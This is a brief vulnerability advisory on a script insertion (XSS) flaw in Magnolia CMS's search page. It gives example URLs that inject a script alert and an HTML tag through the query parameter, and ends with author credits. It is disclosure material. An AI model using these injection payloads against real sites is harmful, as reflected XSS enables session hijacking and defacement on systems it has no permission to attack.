Magnolia CMS suffers from a script insertion vulnerability.
dd524302c41665a82915609e959651905f66bfeb0b514c54f69d243a8cd5213e
# Magnolia CMS Script Insertion Vulnerability
#
# Risk: Medium
# Class: Remote
# Script: Magnolia CMS
# Version: not define
-------------------------------------------------------------------
Example:
http://[target]/[path]/search.html?query=[CODE]&x=0&y=0
http://[target]/[path]/search.html?query=<script>alert("lol");</script>&x=0&y=0
http://[target]/[path]/search.html?query=<body bgcolor="red">&x=0&y=0
-------------------------------------------------------------------
Credit
Author: Kiki
Site: http://kiki91.altervista.org
IRC Channel: irc.azzurra.org 6667 #system